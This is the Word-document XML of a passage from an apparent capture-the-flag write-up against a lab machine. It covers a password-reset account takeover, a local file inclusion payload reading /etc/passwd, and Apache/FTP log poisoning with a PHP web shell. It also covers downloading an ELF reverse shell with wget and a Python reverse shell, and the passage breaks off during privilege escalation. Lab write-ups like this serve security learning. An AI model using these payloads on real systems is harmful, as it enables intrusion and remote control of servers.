      </w:pPr>
      <w:r w:rsidRPr="00C10134">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SquirrelMail version 1.4.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A2874" w14:textId="11024C4E" w:rsidR="008018A3" w:rsidRDefault="00000000" w:rsidP="00C10134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="008018A3" w:rsidRPr="000B5AD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/41910</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76A4A4E4" w14:textId="2001AE65" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc153389822"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="54751051" w14:textId="17ED7BAB" w:rsidR="00D21621" w:rsidRDefault="00774B47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CAE17BB" wp14:editId="02C5D7FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>71669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2633980" cy="579755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20583"/>
                <wp:lineTo x="21402" y="20583"/>
                <wp:lineTo x="21402" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="146479820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98202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3E337" w14:textId="77777777" w:rsidR="00774B47" w:rsidRDefault="00774B47"/>
    <w:p w14:paraId="093F7F8D" w14:textId="08DDAC1F" w:rsidR="00774B47" w:rsidRDefault="009A447D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="565D91C3" wp14:editId="2831F9BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>216658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3989705" cy="313690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19676"/>
                <wp:lineTo x="21452" y="19676"/>
                <wp:lineTo x="21452" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="70545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554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5066" cy="3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67B3" w14:textId="6087C538" w:rsidR="00774B47" w:rsidRDefault="00774B47"/>
    <w:p w14:paraId="62CB2328" w14:textId="6AB96790" w:rsidR="0076259E" w:rsidRDefault="00C41D42">
      <w:r>
        <w:t>It didn’t work…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4C221" w14:textId="4CD8DB56" w:rsidR="005F5421" w:rsidRDefault="000D49F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B0ABAFB" wp14:editId="1B872680">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1055607</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5514286" cy="380952"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20554"/>
                <wp:lineTo x="21493" y="20554"/>
                <wp:lineTo x="21493" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="113801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191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850">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="339121AD" wp14:editId="2920141A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>632725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="299720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20593"/>
                <wp:lineTo x="21538" y="20593"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="73916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641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421">
        <w:t xml:space="preserve">After looking around at the webpage </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="005F5421" w:rsidRPr="000B5AD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://monitor.cybox.company/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005F5421">
        <w:t xml:space="preserve"> I couldn’t find anything. Then I thought about signing out of the webpage and forgetting password</w:t>
      </w:r>
      <w:r w:rsidR="00526C10">
        <w:t>. This would test the email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E6370" w14:textId="054B9555" w:rsidR="00374850" w:rsidRDefault="00BA6F72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E27217D" wp14:editId="5B81D405">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1103583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="254635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19392"/>
                <wp:lineTo x="21538" y="19392"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="100045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77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9F0">
        <w:t>This looks like it might be vulnerable to SQL injection, file inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4236FC" w14:textId="52CCEDBB" w:rsidR="00374850" w:rsidRDefault="003B7099">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="796CD582" wp14:editId="4A534581">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>528320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2085975" cy="811530"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21296"/>
                <wp:lineTo x="21501" y="21296"/>
                <wp:lineTo x="21501" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1787760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6067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F72">
        <w:t>I replaced the email with the admin account, to see what would happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41132A" w14:textId="65EF04F1" w:rsidR="003B7099" w:rsidRDefault="003B7099">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D7FAF53" wp14:editId="1A59FAE0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2073910" cy="706755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20960"/>
                <wp:lineTo x="21428" y="20960"/>
                <wp:lineTo x="21428" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="717265742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65742" name="Picture 1" descr="A screenshot of a web pag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0803" cy="70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2858C9" w14:textId="638C2365" w:rsidR="003B7099" w:rsidRDefault="003B7099"/>
    <w:p w14:paraId="57937ABA" w14:textId="3EA973DA" w:rsidR="003B7099" w:rsidRDefault="003B7099"/>
    <w:p w14:paraId="453E9126" w14:textId="6C9A4AC9" w:rsidR="003B7099" w:rsidRDefault="003B7099">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="003D0ABA">
        <w:t>worked</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD75DF3" w14:textId="54AD8ED8" w:rsidR="003B7099" w:rsidRDefault="006E17D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EF44085" wp14:editId="214DE430">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>256076</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2401570" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20480"/>
                <wp:lineTo x="21417" y="20480"/>
                <wp:lineTo x="21417" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="105560635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06354" name="Picture 1" descr="A computer screen shot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03A">
        <w:t>Admin:admin12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3AFA8" w14:textId="60A27D4B" w:rsidR="00F80ED6" w:rsidRDefault="00F80ED6"/>
    <w:p w14:paraId="5A08372E" w14:textId="02EE1BEF" w:rsidR="00F80ED6" w:rsidRDefault="00F80ED6">
      <w:r>
        <w:t xml:space="preserve">Turns out this style is a </w:t>
      </w:r>
      <w:r w:rsidR="005502E0">
        <w:t>local file inclusion</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5DB2DF" w14:textId="4E63DBE7" w:rsidR="003B7099" w:rsidRDefault="00A955E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="511844A3" wp14:editId="3438CED8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>237130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1122680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21258"/>
                <wp:lineTo x="21538" y="21258"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1547546130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46130" name="Picture 1" descr="A close-up of a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ED6" w:rsidRPr="00F80ED6">
        <w:t>http://monitor.cybox.company/admin/styles.php?style=../../../../../../etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A23C" w14:textId="67F81B36" w:rsidR="003B7099" w:rsidRDefault="006E17D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43B1C6FB" wp14:editId="415C5D5C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1108568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4548505" cy="1344295"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255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882458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58855" name="Picture 1" descr="A screen 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850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AAFE" w14:textId="77777777" w:rsidR="00A955E2" w:rsidRDefault="00A955E2"/>
    <w:p w14:paraId="4F463F70" w14:textId="77777777" w:rsidR="006E17D1" w:rsidRDefault="006E17D1"/>
    <w:p w14:paraId="2A787D2F" w14:textId="77777777" w:rsidR="006E17D1" w:rsidRDefault="006E17D1"/>
    <w:p w14:paraId="2003BDFE" w14:textId="30FE15A1" w:rsidR="00D27B85" w:rsidRDefault="002850F8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>It is now possible to use Apache Log Poisoning through local file inclusion.</w:t>
      </w:r>
      <w:r w:rsidR="00A76D4C">
        <w:t xml:space="preserve"> Since we know that apache is being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F34DA2" w14:textId="78B21D37" w:rsidR="00DB1E0A" w:rsidRDefault="00DB1E0A">
      <w:r>
        <w:t>It begins by modifying the user agent</w:t>
      </w:r>
      <w:r w:rsidR="00AB687F">
        <w:t>, including a php line that will allow the user to execute commands from outside the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613BC63A" w14:textId="3E4A2A2E" w:rsidR="000E764C" w:rsidRDefault="00BC1874" w:rsidP="00E366E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
      <w:r w:rsidR="00026DEC">
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:t>system($_GET[‘c</w:t>
      </w:r>
      <w:r w:rsidR="00026DEC">
        <w:t>md</w:t>
      </w:r>
      <w:r>
        <w:t>’]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD02960" w14:textId="5A368CFD" w:rsidR="000E764C" w:rsidRDefault="00CF3EAB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0ECE85AD" wp14:editId="462ABFF5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13648</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5276190" cy="219048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18837"/>
                <wp:lineTo x="21449" y="18837"/>
                <wp:lineTo x="21449" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="151542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2564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CFD">
        <w:t>Next, get the version of apache to obtain the log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25258E5C" w14:textId="7E65E154" w:rsidR="000E764C" w:rsidRDefault="000E764C"/>
    <w:p w14:paraId="6A075838" w14:textId="702FE358" w:rsidR="00E04CF0" w:rsidRDefault="00E04CF0">
      <w:r>
        <w:t>So this version has it stored in /opt/../access_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186264E2" w14:textId="3BA3DFEE" w:rsidR="00CF3EAB" w:rsidRDefault="0001228A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Now you will notice that if you view the /opt/…/access_log file it coantains all the </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="000B5AD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ftp.cybox.company</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> data. This means you will have to poison the FTP and then access it through the log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F37741" w14:textId="57D313C1" w:rsidR="0001228A" w:rsidRDefault="0001228A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57A9B5CB" wp14:editId="64EA10CF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2847975" cy="1330325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21342"/>
                <wp:lineTo x="21383" y="21342"/>
                <wp:lineTo x="21383" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="22260250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02501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5909" cy="13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F0E4C" w14:textId="362B5D3C" w:rsidR="00CF3EAB" w:rsidRDefault="00CF3EAB"/>
    <w:p w14:paraId="781A023E" w14:textId="5ECED2C0" w:rsidR="00CF3EAB" w:rsidRDefault="00CF3EAB"/>
    <w:p w14:paraId="4487EF0A" w14:textId="1A78910D" w:rsidR="00CF3EAB" w:rsidRDefault="00CF3EAB"/>
    <w:p w14:paraId="6AF27B0D" w14:textId="77777777" w:rsidR="0001228A" w:rsidRDefault="0001228A"/>
    <w:p w14:paraId="69E9D0C6" w14:textId="642521AA" w:rsidR="0001228A" w:rsidRDefault="00CD04BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F2A25A1" wp14:editId="7F895504">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>261089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1186815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21149"/>
                <wp:lineTo x="21538" y="21149"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1130107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748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28A">
        <w:t>This is the ftp webpage that is sent the cmd parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319DA3C" w14:textId="15E6B647" w:rsidR="0001228A" w:rsidRDefault="00263566">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6898E1CB" wp14:editId="4EEB8B99">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1471873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="158115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18217"/>
                <wp:lineTo x="21538" y="18217"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="154170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049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4BA">
        <w:t>Now it is sent you can send the local file inclusion payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4AE94" w14:textId="1C83C87C" w:rsidR="00CF3EAB" w:rsidRDefault="00263566">
      <w:r>
        <w:t>Sending the command ‘id’ has now worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70733F89" w14:textId="096877AF" w:rsidR="00CF3EAB" w:rsidRDefault="00EF679B">
      <w:r>
        <w:t xml:space="preserve">The Current working directory: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF679B">
        <w:t>/opt/bitnami/apache2/htdocs/monitor/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027B2B0" w14:textId="272E30E9" w:rsidR="00CF3EAB" w:rsidRDefault="0011564D">
      <w:r>
        <w:t>I made an ELF reverse shell and downloaded it to the machine in the /tmp directory.</w:t>
      </w:r>
      <w:r w:rsidR="006C144F">
        <w:t xml:space="preserve"> I used “wget -P /tmp &lt;url&gt;”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC44F73" w14:textId="1834A6A5" w:rsidR="006E3F90" w:rsidRDefault="006E3F90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31397740" wp14:editId="36E9C5C2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132705" cy="570865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20903"/>
                <wp:lineTo x="21485" y="20903"/>
                <wp:lineTo x="21485" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="195645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500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EB94B" w14:textId="77777777" w:rsidR="006E3F90" w:rsidRDefault="006E3F90"/>
    <w:p w14:paraId="32757E78" w14:textId="3E1F917A" w:rsidR="006E3F90" w:rsidRDefault="006E3F90"/>
    <w:p w14:paraId="5194A279" w14:textId="07886FC6" w:rsidR="00CF3EAB" w:rsidRDefault="00CF3EAB"/>
    <w:p w14:paraId="17306FD1" w14:textId="77777777" w:rsidR="00E56C74" w:rsidRDefault="00E56C74"/>
    <w:p w14:paraId="6BDAE889" w14:textId="77777777" w:rsidR="00E56C74" w:rsidRDefault="00E56C74"/>
    <w:p w14:paraId="5AE86A42" w14:textId="77777777" w:rsidR="00E56C74" w:rsidRDefault="00E56C74"/>
    <w:p w14:paraId="5333C55C" w14:textId="17B03937" w:rsidR="00E56C74" w:rsidRDefault="008E4B00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713DE9FF" wp14:editId="5F707060">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4356469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="826770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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8120209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20982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C74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40159367" wp14:editId="0068B137">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>512</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3893185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417479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7933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C74">
        <w:t>This is a basic python reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="00B0185D">
        <w:t xml:space="preserve"> I made sure to use a lower port because the daemon has the permissions to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B788120" w14:textId="740FF2AE" w:rsidR="00575D72" w:rsidRDefault="00575D72" w:rsidP="00575D72">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc153389823"/>
      <w:r>
        <w:t>Flag 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="59AC5374" w14:textId="00D4FFC4" w:rsidR="00575D72" w:rsidRDefault="00575D72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251745280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5298F1F5" wp14:editId="5E560002">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3761905" cy="361905"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20499"/>
                <wp:lineTo x="21440" y="20499"/>
                <wp:lineTo x="21440" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="104947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789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2F7B4" w14:textId="5E5E55A6" w:rsidR="00575D72" w:rsidRDefault="00575D72"/>
    <w:p w14:paraId="7105C072" w14:textId="42BC1BE9" w:rsidR="00C1059E" w:rsidRDefault="00C1059E" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc153389824"/>
      <w:r>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="54B1E40A" w14:textId="43820E0D" w:rsidR="00D21621" w:rsidRDefault="00784817">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251749376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E08EDC6" wp14:editId="73254773">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-17452</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3798045" cy="2376182"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21473"/>
                <wp:lineTo x="21452" y="21473"/>
                <wp:lineTo x="21452" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="233633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33131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98045" cy="237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4C2">
        <w:t>The two highlighted pieces of text are crucial here. The text shows that the username is added to a group and that a user will be added to the system and that group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F38816" w14:textId="607F030E" w:rsidR="00160B52" w:rsidRDefault="00160B52">
      <w:r>
